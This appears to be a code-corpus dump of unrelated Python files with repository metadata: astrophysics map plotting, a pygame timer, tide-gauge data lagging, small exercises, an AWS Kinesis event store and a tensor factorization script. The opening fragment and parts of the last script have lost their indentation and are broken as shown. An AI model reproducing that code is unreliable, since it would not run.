mapFile = mapPrefix + '/IC_24H_sid.fits'
a = ['-f '+mapFile+' -n relint -s 3 --half -m -2 -M 2']
a += ['--customOut IC_relint_unsmoothed']
if opts['unsmoothed']:
argList += a
# IC59 map
mapFile = mapPrefix + '/IC59_24H_sid.fits'
a = ['-f '+mapFile+' -n relint -S 20 -s 4 -m -2 -M 2 --multi 2 --half']
if opts['ic59']:
argList += a
# IceTop maps
mapFile = mapPrefix + '/IT_24H_sid_STA8.fits'
#a = [mapFile+' -n relint -S 20 -s 3 -m -3 -M 3']
#a += [mapFile+' -n signal -S 20 -m -9 -M 9']
label = medianLabel('IT', 8, 100)
a = '%s -n relint -S 20 -s 3 -m -3 -M 3 --llabel %s' % (mapFile, label)
a += ' --rlabel IceTop --half'
if opts['it']:
argList += [a]
# Anisotropy as a function of energy
a = []
eBins = getEbins()
eMins, eMaxs = eBins[:-1], eBins[1:]
mapFiles = getEnergyMaps('IC')
for i, f in enumerate(mapFiles):
mapFile = ' '.join(f)
label = medianLabel('IC', eMins[i], eMaxs[i])
tempArgs = '%s -n relint -S 20 -s 3 --llabel %s' % (mapFile, label)
tempArgs += ' --half'
minmax = 3 if float(eMins[i]) >= 6.5 else 1
tempArgs += ' -m -%i -M %i' % (minmax, minmax)
# Custom naming for merged file
if len(f) > 1:
tempArgs += ' --customOut IC_24H_sid_5pt5-6GeV_relint_20deg'
a += [tempArgs]
if opts['ebins']:
argList += a
# Polar plots
a = []
for i, f in enumerate(mapFiles):
mapFile = ' '.join(f)
label = medianLabel('IC', eMins[i], eMaxs[i])
tempArgs = '%s -n relint -S 20 -s 3 --polar' % mapFile
tempArgs += ' --llabel %s' % label
minmax = 3 if float(eMins[i]) >= 6.5 else 1
tempArgs += ' -m -%i -M %i' % (minmax, minmax)
if len(f) > 1:
tempArgs += ' --customOut IC_24H_sid_5pt5-6GeV_relint_20deg_polar'
a += [tempArgs]
label = medianLabel('IT', 8, 100)
mapFile = '%s/IT_24H_sid_STA8.fits' % mapPrefix
a += ['%s -n relint -S 20 -s 3 -m -3 -M 3 --polar --llabel %s --rlabel %s' % \
(mapFile, label, 'IceTop')]
if opts['polar']:
argList += a
# Solar dipole
mapFile = mapPrefix + '/IC_24H_solar.fits'
a = [mapFile+' -n relint -S 20 -s 4 -m -3 -M 3 --half']
a += [mapFile+' -n signal -S 20 -m -33 -M 33 --half']
mapFile = mapPrefix + '/IT_24H_solar_NotSTA8.fits'
mapFile += ' %s/IT_24H_solar_STA8.fits' % mapPrefix
newArg = mapFile+' -n relint -S 20 -s 4 -m -3 -M 3 --half'
newArg += ' --customOut IT_24H_solar_relint'
a += [newArg]
newArg = mapFile+' -n signal -S 20 -m -3.5 -M 3.5 --half'
newArg += ' --customOut IT_24H_solar_signal'
a += [newArg]
if opts['solar']:
argList += a
# Apply default arguments and plot command function
argList = ['{} {} {}'.format(cmd, a, defArgs) for a in argList]
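    # Illustrative shape of one assembled element of argList (paths depend on
    # the myGlobals setup above):
    #   <ani_home>/mapfunctions/plotFITS.py <maps>/IC_24H_sid.fits -n relint
    #     -S 5 -s 3 -m -1.5 -M 1.5 --half --gplane -o --mask --outDir <outDir> --ext png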
for a in argList:
a = a.split(' ')
proc = subprocess.Popen(a)
##=========================================================================
## Other plots
# Square comparison maps
if opts['square']:
cmd = '%s/mapFunctions/plotFITS.py' % my.ani_home
mapFile = mapPrefix + '/IC_24H_sid.fits'
a = '%s %s -n signal -S 5 -m -12 -M 12 --multi 2' % (cmd, mapFile)
a += ' --ramin -90 --ramax 0 --decmin -80 --decmax -35'
a += ' -o --mask --outDir %s --ext %s' % (outDir, ext)
a += ' --customOut IC_24H_square'
if batch:
a += ' -b'
proc = subprocess.Popen(a.split(' '))
# Recreate IC59 original map
b = a.replace('IC_', 'IC59_')
b = b.replace('-S 5', '-S 20')
proc = subprocess.Popen(b.split(' '))
# Power spectrum
out = outDir + 'IC_Power_Spectrum.' + ext
if opts['powerspec']:
mapFile = '%s/maps/merged/IC_24H_sid.fits' % my.ani_data
cmd = 'python %s/polspice/spice.py' % my.ani_home
a = '%s %s -a 1 -A 130 -t 140 --multi 2 -o %s' % (cmd, mapFile, out)
#a += ' --nofull'
a = a.split(' ')
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# Dipole phase
#out = outDir + 'IC_Dipole_Phase.' + ext
#if opts['dipole']:
# from anisotropy.mapFunctions.dipolePlot import energyPlot
# offset = 90
# energyPlot(offset=offset, out=out, batch=batch)
#out = outDir + 'IC_Minimum_Phase.' + ext
#if opts['minima']:
# from anisotropy.mapFunctions.dipolePlot import minimumPlot
# offset=90
# minimumPlot(offset=offset, out=out, batch=batch)
if opts['dipole']:
out = '{}/IC_Dipole.{}'.format(outDir, ext)
cmd = 'python {}/mapfunctions/phasePlot.py'.format(my.ani_home)
a = '{} -f energy -l 3 -o {} --offset 90 -n 72'.format(cmd, out)
#a = '%s -f energy -l 4 -o %s --offset 90' % (cmd, out)
a = a.split(' ')
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# Reconstructed energy table
config = 'IC59'
out = outDir + config+'_Median_Energy.' + ext
if opts['reco']:
from anisotropy.icesim.plots import reco_energy_plot
reco_energy_plot(config, out=out, batch=batch)
# Energy distribution plot
config = 'IC86'
out = outDir + config+'_Energy_Distributions.' + ext
if opts['edist']:
from anisotropy.icesim.plots import eres
eres(config, out=out, batch=batch)
config = 'IC59'
out = outDir + config+'_Energy_Dist2.' + ext
if opts['edist2']:
from anisotropy.icesim.plots import eres2
eres2(config, out=out, batch=batch)
# One-dimensional projection
out = outDir + 'IC_proj1d.' + ext
mapTypes = ['sid','solar']
#mapTypes = ['anti','ext']
if opts['proj']:
mapFiles = ['%s/IC_24H_%s.fits' % (mapPrefix, i) \
for i in mapTypes]
a = ['%s/mapFunctions/proj1d.py' % my.ani_home]
a += mapFiles
a += ['-z','-o',out,'--syserr','--labels','method']
#a += ['-z','-o',out]
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# One-dimensional projection
out = outDir + 'IC_proj1d_err.' + ext
mapTypes = ['anti','ext']
if opts['projerr']:
mapFiles = ['%s/IC_24H_%s.fits' % (mapPrefix, i) \
for i in mapTypes]
a = ['%s/mapFunctions/proj1d.py' % my.ani_home]
a += mapFiles
a += ['-z','-o',out,'--labels','method']
if batch:
a += ['-b']
proc = subprocess.Popen(a)
# One-dimensional projection for each year
if opts['projcomp']:
cmd = '%s/mapFunctions/proj1d.py' % my.ani_home
configs = ['IC59','IC79','IC86','IC86-II','IC86-III','IC86-IV']
files = ['%s/%s_24H_sid.fits' % (mapPrefix, cfg) for cfg in configs]
files = ' '.join(files)
out = outDir + 'IC_proj1d_comp.' + ext
a = '%s %s -z -o %s --syserr --labels configs' % (cmd, files, out)
if batch:
a += ' -b'
proc = subprocess.Popen(a.split(' '))
if opts['smallscale']:
cmd = 'python %s/mapFunctions/testsmall.py' % my.ani_home
out = outDir + 'IC_SmallScale.' + ext
a = '%s --paper -o %s' % (cmd, out)
if batch:
a += ' -b'
proc = subprocess.Popen(a.split(' '))
| [
"[email protected]"
] | |
98730ea9cabba62f347e29709bcad21695798feb | b6dce5523115d7e51ce1c5bf11ca963f9a17f04c | /shift/utils/timer.py | 4be249aeb97ad182f8bf6179f4a88b92a227a55e | [
"MIT"
] | permissive | fyabc/Py2016 | 1fcb345df6bcd89348686e13337158aa4325a8e0 | a7e2b4ad11c96be97107821defef379d6e6f7595 | refs/heads/master | 2020-12-29T02:37:17.580568 | 2017-02-27T16:18:02 | 2017-02-27T16:18:02 | 54,388,415 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | # -*- coding: utf-8 -*-
__author__ = 'fyabc'
import pygame
import time
class ShiftTimer:
"""The Timer of this game. Copied from pgu.timer.
    This is a singleton class. Do NOT have two ShiftTimer objects at the same time.
"""
# The game time when one of the clock parameters was last changed
lastGameTime = None
# The real time corresponding to the last game time
lastRealTime = None
# The game time when 'tick' was last called
lastTickTime = None
# Whether the timer is paused or not
paused = False
# When this clock was created
startTime = None
# The speed which this clock moves at relative to the real clock
speed = 1
def __init__(self):
self.lastGameTime = 0
self.lastTickTime = 0
self.lastRealTime = time.time()
self.startTime = time.time()
# Set the rate at which this clock ticks relative to the real clock
def set_speed(self, n):
assert (n >= 0)
self.lastGameTime = self.getTime()
self.lastRealTime = time.time()
self.speed = n
# Pause the clock
def pause(self):
if not self.paused:
self.lastGameTime = self.getTime()
self.lastRealTime = time.time()
self.paused = True
# Resume the clock
def resume(self):
if self.paused:
self.paused = False
self.lastRealTime = time.time()
def tick(self, fps=0):
tm = self.getTime()
dt = tm - self.lastTickTime
if fps > 0:
minTime = 1.0 / fps
if dt < minTime:
pygame.time.wait(int((minTime - dt) * 1000))
dt = minTime
self.lastTickTime = tm
return dt
# Returns the amount of 'game time' that has passed since creating
# the clock (paused time does not count).
def getTime(self):
if self.paused:
return self.lastGameTime
return self.speed * (time.time() - self.lastRealTime) + self.lastGameTime
def getRealTime(self):
return time.time() - self.startTime
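# Illustrative usage sketch (not part of the original module; method names are
# taken from the class above, the frame-rate value and loop variable are assumed):
#
#   timer = ShiftTimer()
#   while game_running:
#       dt = timer.tick(60)            # cap at ~60 fps; dt is elapsed game time (s)
#       update(dt)
#   timer.pause(); timer.resume()      # freeze / unfreeze game time
#   timer.set_speed(2)                 # run game time at twice real time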
| [
"[email protected]"
] | |
2db6b9d03d9ffa6ad05fa7db612b7e2db5364dd6 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/02_preprocessing/merraLagScripts/443-tideGauge.py | 1cfa0de339d2f9659ec80f2176dd2e40a6ad8413 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
# dir_name = 'F:\\01_erainterim\\03_eraint_lagged_predictors\\eraint_D3'
dir_in = "/lustre/fs0/home/mtadesse/merraAllCombined"
dir_out = "/lustre/fs0/home/mtadesse/merraAllLagged"
def lag():
os.chdir(dir_in)
#get names
tg_list_name = sorted(os.listdir())
x = 443
y = 444
for tg in range(x, y):
os.chdir(dir_in)
tg_name = tg_list_name[tg]
print(tg_name, '\n')
pred = pd.read_csv(tg_name)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
        first prepare the lagged-time dataframes (one per lag hour)
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
        #note: for MERRA, 31 hourly lags (0-30 hours) are used here instead of
        #the 6 lags used in the ERA-Interim version of this script
time_lagged = pd.DataFrame()
lag_hrs = list(range(0, 31))
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        #dataframe that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
            #merge the selected lagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
| [
"[email protected]"
] | |
64411eeed18edf4d09de5cf319c24119d1bea4e2 | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/lag82/443-tideGauge.py | 00c7b277a09c1bb696c020bb8ff48ee0b7724626 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,984 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Mar 31 17:12:23 2020
****************************************************
Load predictors & predictands + predictor importance
****************************************************
@author: Michael Tadesse
"""
#import packages
import os
import pandas as pd
import datetime as dt #used for timedelta
from datetime import datetime
#define directories
dir_in = '/lustre/fs0/home/mtadesse/ereaFiveCombine'
dir_out = '/lustre/fs0/home/mtadesse/eraFiveLag'
def lag():
os.chdir(dir_in)
#get names
tg_list_name = os.listdir()
x = 443
y = 444
for t in range(x, y):
tg_name = tg_list_name[t]
print(tg_name, '\n')
# #check if the file exists
# os.chdir(dir_out)
# if (os.path.isfile(tg_name)):
# print('file already exists')
# continue
#cd to where the actual file is
os.chdir(dir_in)
pred = pd.read_csv(tg_name)
pred.sort_values(by = 'date', inplace=True)
pred.reset_index(inplace = True)
pred.drop('index', axis = 1, inplace = True)
#create a daily time series - date_range
#get only the ymd of the start and end times
start_time = pred['date'][0].split(' ')[0]
end_time = pred['date'].iloc[-1].split(' ')[0]
print(start_time, ' - ', end_time, '\n')
date_range = pd.date_range(start_time, end_time, freq = 'D')
#defining time changing lambda functions
time_str = lambda x: str(x)
time_converted_str = pd.DataFrame(map(time_str, date_range), columns = ['date'])
time_converted_stamp = pd.DataFrame(date_range, columns = ['timestamp'])
"""
first prepare the six time lagging dataframes
then use the merge function to merge the original
predictor with the lagging dataframes
"""
#prepare lagged time series for time only
        #note: six lags are used here, spaced 6 hours apart (0-30 hours)
time_lagged = pd.DataFrame()
lag_hrs = [0, 6, 12, 18, 24, 30]
for lag in lag_hrs:
lag_name = 'lag'+str(lag)
lam_delta = lambda x: str(x - dt.timedelta(hours = lag))
lag_new = pd.DataFrame(map(lam_delta, time_converted_stamp['timestamp']), \
columns = [lag_name])
time_lagged = pd.concat([time_lagged, lag_new], axis = 1)
        #dataframe that contains all lagged time series (just time)
time_all = pd.concat([time_converted_str, time_lagged], axis = 1)
pred_lagged = pd.DataFrame()
for ii in range(1,time_all.shape[1]): #to loop through the lagged time series
print(time_all.columns[ii])
#extracting corresponding tag time series
lag_ts = pd.DataFrame(time_all.iloc[:,ii])
lag_ts.columns = ['date']
            #merge the selected lagged time with the predictor on = "date"
pred_new = pd.merge(pred, lag_ts, on = ['date'], how = 'right')
pred_new.drop('Unnamed: 0', axis = 1, inplace = True)
#sometimes nan values go to the bottom of the dataframe
#sort df by date -> reset the index -> remove old index
pred_new.sort_values(by = 'date', inplace=True)
pred_new.reset_index(inplace=True)
pred_new.drop('index', axis = 1, inplace= True)
#concatenate lagged dataframe
if ii == 1:
pred_lagged = pred_new
else:
pred_lagged = pd.concat([pred_lagged, pred_new.iloc[:,1:]], axis = 1)
#cd to saving directory
os.chdir(dir_out)
pred_lagged.to_csv(tg_name)
os.chdir(dir_in)
#run script
lag()
| [
"[email protected]"
] | |
f5c65c37b451bb7845cec225a79a12aa20bfce04 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /KPicBthv6WhHFGapg_17.py | 7aa3aa5f1a8fb508597b2d6bcee51885d1d6d0bd | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 595 | py | """
Create a function that returns the **number of syllables** in a simple string.
The string is made up of _short repeated words_ like `"Lalalalalalala"` (which
would have _7 syllables_ ).
### Examples
count_syllables("Hehehehehehe") ➞ 6
count_syllables("bobobobobobobobo") ➞ 8
count_syllables("NANANA") ➞ 3
### Notes
* For simplicity, please note that each syllable will consist of two letters only.
* Your code should accept strings of any case (upper, lower and mixed case).
"""
def count_syllables(txt):
t = txt.lower()
return t.count(t[0:2])
| [
"[email protected]"
] | |
f066cea6f931f46a65d678f695ba5d46150afd2f | 75402b6c851a12ae41359fdd83e89d2160c308af | /zentral/core/stores/backends/kinesis.py | a5c04ab974baab80ac23fec6e49719b18ff53a28 | [
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-commercial-license"
] | permissive | neocode12/zentral | 7b05aeeb823a5a3d7d268cc2b01e0bf1a5e4be71 | 9ecc8d8334148627fcccaa875f100adacd7a018b | refs/heads/main | 2023-04-09T12:06:45.355559 | 2023-03-15T14:05:05 | 2023-03-15T14:05:05 | 327,651,549 | 0 | 0 | Apache-2.0 | 2021-01-07T15:30:00 | 2021-01-07T15:30:00 | null | UTF-8 | Python | false | false | 4,096 | py | import logging
import boto3
from kombu.utils import json
from zentral.core.exceptions import ImproperlyConfigured
from zentral.core.stores.backends.base import BaseEventStore
from zentral.utils.boto3 import make_refreshable_assume_role_session
logger = logging.getLogger('zentral.core.stores.backends.kinesis')
class EventStore(BaseEventStore):
max_batch_size = 500
def __init__(self, config_d):
super(EventStore, self).__init__(config_d)
self.stream = config_d["stream"]
self.region_name = config_d["region_name"]
self.credentials = {}
for k in ("aws_access_key_id", "aws_secret_access_key"):
v = config_d.get(k)
if v:
self.credentials[k] = v
self.assume_role_arn = config_d.get("assume_role_arn")
self.serialization_format = config_d.get("serialization_format", "zentral")
if self.serialization_format not in ("zentral", "firehose_v1"):
raise ImproperlyConfigured("Unknown serialization format")
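    # Illustrative config_d (sketch only - every value below is a placeholder;
    # the keys are exactly the ones read in __init__ above):
    # {
    #     "stream": "zentral-events",
    #     "region_name": "us-east-1",
    #     "aws_access_key_id": "...",                                   # optional
    #     "aws_secret_access_key": "...",                               # optional
    #     "assume_role_arn": "arn:aws:iam::123456789012:role/zentral",  # optional
    #     "serialization_format": "firehose_v1",                        # or "zentral" (default)
    # }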
def wait_and_configure(self):
session = boto3.Session(**self.credentials)
if self.assume_role_arn:
logger.info("Assume role %s", self.assume_role_arn)
session = make_refreshable_assume_role_session(
session,
{"RoleArn": self.assume_role_arn,
"RoleSessionName": "ZentralStoreKinesis"}
)
self.client = session.client('kinesis', region_name=self.region_name)
self.configured = True
def _serialize_event(self, event):
if not isinstance(event, dict):
event_d = event.serialize()
else:
event_d = event
event_id = event_d['_zentral']['id']
event_index = event_d['_zentral']['index']
partition_key = f"{event_id}{event_index}"
if self.serialization_format == "firehose_v1":
metadata = event_d.pop("_zentral")
event_type = metadata.pop("type")
created_at = metadata.pop("created_at")
tags = metadata.pop("tags", [])
objects = metadata.pop("objects", {})
serial_number = metadata.pop("machine_serial_number", None)
event_d = {
"type": event_type,
"created_at": created_at,
"tags": tags,
"probes": [probe_d["pk"] for probe_d in metadata.get("probes", [])],
"objects": [f"{k}:{v}" for k in objects for v in objects[k]],
"metadata": json.dumps(metadata),
"payload": json.dumps(event_d),
"serial_number": serial_number
}
return json.dumps(event_d).encode("utf-8"), partition_key, event_id, event_index
def store(self, event):
self.wait_and_configure_if_necessary()
data, partition_key, _, _ = self._serialize_event(event)
return self.client.put_record(StreamName=self.stream,
Data=data,
PartitionKey=partition_key)
def bulk_store(self, events):
self.wait_and_configure_if_necessary()
if self.batch_size < 2:
raise RuntimeError("bulk_store is not available when batch_size < 2")
event_keys = []
records = []
for event in events:
data, partition_key, event_id, event_index = self._serialize_event(event)
event_keys.append((event_id, event_index))
records.append({'Data': data, 'PartitionKey': partition_key})
if not records:
return
response = self.client.put_records(Records=records, StreamName=self.stream)
failed_record_count = response.get("FailedRecordCount", 0)
if failed_record_count == 0:
# shortcut
yield from event_keys
return
logger.warning("%s failed record(s)", failed_record_count)
for key, record in zip(event_keys, response.get("Records", [])):
if record.get("SequenceNumber") and record.get("ShardId"):
yield key
| [
"[email protected]"
] | |
af646b7ff78e8c9fcdc8fbc2cb08695b04778a24 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/127/usersdata/218/35224/submittedfiles/ex11.py | 4cdc5c3d13ba6d1d5401867a17bcaa65083f3520 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py | # -*- coding: utf-8 -*-
D1=int(input('digite o dia da data 1:'))
D2=int(input('digite o dia da data 2:'))
M1=int(input('digite o mês da data 1:'))
M2=int(input('digite o mês da data 2:'))
A1=int(input('digite o ano da data 1:'))
A2=int(input('digite o ano da data 2:'))
# build the two dates as strings so the later one can be printed;
# prints 'iguais' (Portuguese for 'equal') when the dates match
data1 = '{}/{}/{}'.format(D1, M1, A1)
data2 = '{}/{}/{}'.format(D2, M2, A2)
if A1 > A2:
    print(data1)
elif A2 > A1:
    print(data2)
else:
    if M1 > M2:
        print(data1)
    elif M2 > M1:
        print(data2)
    else:
        if D1 > D2:
            print(data1)
        elif D2 > D1:
            print(data2)
        else:
            print('iguais') | [
"[email protected]"
] | |
0fc2541411dcb465d061d206bdbd4ed4a27b5913 | ea97a6d0d5ffc5ec2730b63a20b1f4de0bd8112d | /scurgen/test/axes_demo.py | a74c934af8fb6965cae2a134495e19057c3db58d | [] | no_license | daler/scurgen | 35d5ee35243a41b75c444f5bb71380ba80ba72c6 | ca0e4f30e9573684b90a8123e31982490b5fe473 | refs/heads/master | 2020-12-24T19:18:19.587609 | 2013-03-11T16:35:33 | 2013-03-11T16:35:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,375 | py | import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import matplotlib.gridspec as gs
import numpy as np
fig = plt.figure(figsize=(10,10))
nchroms = 21
nrows = int(np.round(np.sqrt(nchroms)))
ncols = nrows
nfiles = 3
CHROM = dict(
left= 0.05,
right=0.8,
top=0.9,
bottom=0.2,
wspace=0.1,
hspace=0.1)
SLIDER_PAD = 0.01
SLIDER = dict(
left=CHROM['left'],
right=CHROM['right'],
bottom=0.1,
top=CHROM['bottom'] - SLIDER_PAD,
hspace=0.5,
)
CBAR_PAD = 0.01
CBAR = dict(
left=CHROM['right'] + CBAR_PAD,
right=0.9,
wspace=SLIDER['hspace'],
top=CHROM['top'],
bottom=CHROM['bottom'],
)
CHECKS = dict(
top=SLIDER['top'],
bottom=SLIDER['bottom'],
left=SLIDER['right'] + CBAR_PAD,
right=CBAR['right'],
wspace=CBAR['wspace'],
hspace=SLIDER['hspace'])
chroms = gs.GridSpec(nrows, ncols)
chroms.update(**CHROM)
axs1 = [plt.subplot(i) for i in chroms]
sliders = gs.GridSpec(nfiles, 1)
sliders.update(**SLIDER)
axs2 = [plt.subplot(i) for i in sliders]
colorbars = gs.GridSpec(1, nfiles)
colorbars.update(**CBAR)
axs3 = [plt.subplot(i) for i in colorbars]
checks = gs.GridSpec(nfiles, nfiles)
checks.update(**CHECKS)
axs4 = [plt.subplot(checks[i, i]) for i in range(nfiles)]
for ax in axs2 + axs4:
ax.set_xticks([])
ax.set_yticks([])
plt.show()
| [
"[email protected]"
] | |
9854d7859fa4e053576c83e5b67de5d52be02adc | ae646229187ab11607e4889e1cf0e380b26fae5c | /experiment_code/loadtensor_runfactorization_printphenotypes.py | 7733aba7df01dbc0f8b66758c204b1db20dc5dc9 | [] | no_license | aschein/tensor_analysis | cb60caf56713cfb7191c46d3cc20c32ea591d382 | 155754be7fa8cfb97432997cb66aa37b1a7b582b | refs/heads/master | 2021-01-17T07:44:00.657311 | 2014-09-11T20:45:14 | 2014-09-11T20:45:14 | 34,183,143 | 1 | 2 | null | 2018-08-25T20:15:18 | 2015-04-18T21:19:08 | Python | UTF-8 | Python | false | false | 9,319 | py | ## this combines the 2 scripts into one comprehensive one:
##
## last modified aug 28, 2014
##
## 1. run_factorization_localadmin.py
## 2. analyze_tensor_factors_withGamma.py
##
## INPUT:
## R
## alpha
## gammaForTF: numbers separated by commas, ex: '0.001, 0.1, 0.1'
## tensor_filename
## save_folder
##
## OUTPUT:
## tensor factorizaiton results in dir save_folder/
## pheno_htn_subset_analyzed_REG_<gamma_str>.pickle
## pheno_htn_subset_analyzed_AUG_<gamma_str>.pickle
## Yinfo_htn_subset_analyzed_<gamma_str>.pickle
##
## analyzed PHENOTYPE output in save_folder/
## phenotypes_<gamma_str>.out
##
## pre-requisites: load environment -- these scripts need to be run first:
##
##
###########################################################################################
## sample inputs:
#R = 50
#alpha = 1
#gammaForTF = [0.001, 0.1, 0.1]
#save_folder = './pickle_folder_20140828/'
#tensor_input = "htn-tensor-subsetforanalysis-20140811-{0}.dat"
import sys
R = int(sys.argv[1])
alpha = float(sys.argv[2])
gammaForTF = sys.argv[3]
tensor_input = sys.argv[4]
CODE_DIR = sys.argv[5]
save_folder = sys.argv[6]
gammaForTF = gammaForTF.split(',')
gammaForTF = [float(x) for x in gammaForTF]
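# Hypothetical invocation matching the sys.argv order above (paths are
# placeholders; numeric values taken from the sample inputs listed earlier):
#   python loadtensor_runfactorization_printphenotypes.py 50 1 "0.001,0.1,0.1" \
#       "htn-tensor-subsetforanalysis-20140811-{0}.dat" ./code_dir/ ./pickle_folder_20140828/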
#load required modules:
print "loading required modules"
execfile( CODE_DIR + 'setup_python_env.py')
pheWAS_xls_file = CODE_DIR + 'ICD9-2-PheWAS.xls'
#create output folder if it does not exist
if not os.path.exists(save_folder):
os.makedirs(save_folder)
#do tensor factorization on the SUBSET - with GAMMA as set above ##################################################################################################
#laod the tensor for the subset!
print "loading tensor data"
loaded_X, loaded_axisDict, loaded_classDict = tensorIO.loadSingleTensor(tensor_input)
startTime = time.time()#start time -- to time it
##factorization
print "running factorization"
spntf_htn_subset_analyzed_withGamma = SP_NTF.SP_NTF(loaded_X, R=R, alpha=alpha)
Yinfo_htn_subset_analyzed_withGamma = spntf_htn_subset_analyzed_withGamma.computeDecomp(gamma=gammaForTF)
marbleElapse = time.time() - startTime #elapsed time
#tensor decomposition factors ("phenotypes"):
pheno_htn_subset_analyzed_withGamma_REG = spntf_htn_subset_analyzed_withGamma.M[0]
pheno_htn_subset_analyzed_withGamma_AUG = spntf_htn_subset_analyzed_withGamma.M[1]
pheno_htn_subset_analyzed_withGamma = (pheno_htn_subset_analyzed_withGamma_REG, pheno_htn_subset_analyzed_withGamma_AUG)
#string for saving the file based upon gamma
gamma_str = '_gamma'
for num in gammaForTF:
gamma_str = gamma_str + '-' + str(num)
gamma_str = gamma_str + '.pickle'
#save factorization in pickle
outfile_str = save_folder + "pheno_htn_subset_analyzed_REG" + gamma_str
with open(outfile_str, "wb") as output_file: ##IMPT! phenotype stored in this pickle
pickle.dump(pheno_htn_subset_analyzed_withGamma, output_file)
output_file.close()
outfile_str = save_folder + "pheno_htn_subset_analyzed_AUG" + gamma_str
with open(outfile_str, "wb") as output_file: ##IMPT! phenotype stored in this pickle
pickle.dump(pheno_htn_subset_analyzed_withGamma, output_file)
output_file.close()
outfile_str = save_folder + "Yinfo_htn_subset_analyzed" + gamma_str
with open(outfile_str, "wb") as output_file:
pickle.dump(Yinfo_htn_subset_analyzed_withGamma, output_file)
output_file.close()
###########################################################################################################################
##
## now, load the pickle'd phenotypes, convert to readable phenotype format, and print into output file!
##
##
import operator
def calculateValues(TM, M):
fms = TM.greedy_fms(M)
fos = TM.greedy_fos(M)
nnz = tensorTools.countTensorNNZ(M)
return fms, fos, nnz
## load the tensor #######
loaded_X, loaded_axisDict, loaded_classDict = tensorIO.loadSingleTensor(tensor_input)
##read in the pickles:
outfile_str = save_folder + "pheno_htn_subset_analyzed_REG" + gamma_str
matrix_pkl = open(outfile_str, "rb")
pheno_htn_subset_analyzed_REG_withGamma = pickle.load(matrix_pkl)
matrix_pkl.close()
outfile_str = save_folder + "Yinfo_htn_subset_analyzed" + gamma_str
matrix_pkl = open(outfile_str, "rb")
Yinfo_htn_subset_analyzed_withGamma = pickle.load(matrix_pkl)
matrix_pkl.close()
#write output file
pheno_outstream = open(save_folder + "phenotypes"+gamma_str+".out", 'w+')
##############################################################################################################
#load pheWAS dictionary
xls = pd.ExcelFile(pheWAS_xls_file)
df_pheWAS = xls.parse(xls.sheet_names[0])
d_jdrange_lookup = dict(zip(list(df_pheWAS.JD_X_RANGE), list(df_pheWAS.JD_X_NAME)))
#############################################################################################################
#tensor with all phenotypes (factorization)
